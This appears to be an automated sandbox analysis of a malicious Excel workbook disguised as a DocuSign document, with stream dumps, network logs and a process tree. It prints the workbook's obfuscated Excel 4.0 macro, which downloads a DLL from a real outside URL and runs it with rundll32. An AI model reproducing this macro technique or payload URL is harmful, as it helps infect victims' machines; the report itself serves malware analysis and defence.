                Contains Dirty Links:False

                Streams

                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.335261663834
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . D o c s 1 . . . . . D o c s 2 . . . . . D o c s 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 86 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.248866429231
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . 8 . . . . . . . @ . . . . . . . L . . . . . . . d . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . i . . . , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 84 00 00 00 06 00 00 00 01 00 00 00 38 00 00 00 08 00 00 00 40 00 00 00 12 00 00 00 4c 00 00 00 0c 00 00 00 64 00 00 00 0d 00 00 00 70 00 00 00 13 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00 35 00 00 00 1e 00 00 00
                Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 269254
                General
                Stream Path:Book
                File Type:Applesoft BASIC program data, first line number 8
                Stream Size:269254
                Entropy:3.16227621583
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . 5 B . . . . . . . . . . . . . . . . . . . . . . . D o c s 2 . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . . . * . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X .
                Data Raw:09 08 08 00 00 05 05 00 17 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 01 35 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                Macro 4.0 Code

                "=ACOSH(8768687687)=ACOS(887687324345)=ASIN(543873524385)=ACOSH(4538354354)=ACOS(54345354345)=ASIN(54354323215216300000)=ACOSH(4535435483212210000)=ACOS(5.46863453535456E+26)=ASIN(4.21621642164261E+27)=ACOSH(45354354385783400000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(35435434852432200000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(35435434852432200000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=CALL(Docs3!BX32&Docs3!BS25&Docs3!BQ45&Docs3!BQ46,Docs3!BZ32&Docs3!CA33&Docs3!BY34&Docs3!CA35&Docs3!CA36,Docs3!CB32&Docs3!CB33,0,Docs3!BU14,Docs3!BZ22,0,0)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=Docs1!AU22()"
                ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=ACOSH(235423542354354000000)=ACOS(2.42542542452542E+24)=ASIN(4.21621642164261E+27)=EXEC(Docs3!BW41&Docs3!BW42&Docs3!BW43&Docs3!BW44&Docs3!BZ22&Docs3!BZ41&Docs3!CA41&Docs3!BZ42&Docs3!BZ43)=Docs3!BA22(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                ,,,,,,,,,,,,,,,,,,,,http://www.algostore.in/algostoreold/printme.php,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,..\hdoanal.sbl,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,RL,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,U,,UR,,JJC,,,,,,,,,,,,,,,,,,,,,,,,,,LDow,CBB,,,,,,,,,,,,,,,,,,,,,,,,nload,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ToFil,,,,,,,,,,,,,,,,,,,,,,,,,,,eA,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,r,,,",St",a,,,,,,,,,,,,,,,,,,,,,,,u,,,rt,,,,,,,,,,,,,,,,,,,,,,,,ndl,,,W,,,,,,,,,,,,,,,,,,,,,,,,l32 ,,,,,,,,,,,,,,,,,,,,,Mo,,,,,,,,,,,,,,,,,,,,,,,,,,,n,,,,,,,,,,,

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 8, 2021 18:31:14.575733900 CEST4916580192.168.2.22103.212.121.53
                Apr 8, 2021 18:31:17.583440065 CEST4916580192.168.2.22103.212.121.53
                Apr 8, 2021 18:31:23.636692047 CEST4916580192.168.2.22103.212.121.53

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 8, 2021 18:31:14.504771948 CEST5219753192.168.2.228.8.8.8
                Apr 8, 2021 18:31:14.560906887 CEST53521978.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Apr 8, 2021 18:31:14.504771948 CEST192.168.2.228.8.8.80xa4ceStandard query (0)www.algostore.inA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Apr 8, 2021 18:31:14.560906887 CEST8.8.8.8192.168.2.220xa4ceNo error (0)www.algostore.inalgostore.inCNAME (Canonical name)IN (0x0001)
                Apr 8, 2021 18:31:14.560906887 CEST8.8.8.8192.168.2.220xa4ceNo error (0)algostore.in103.212.121.53A (IP address)IN (0x0001)

                Code Manipulations

                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:18:30:37
                Start date:08/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13fa10000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:18:31:02
                Start date:08/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:rundll32 ..\hdoanal.sbl,StartW
                Imagebase:0xffca0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >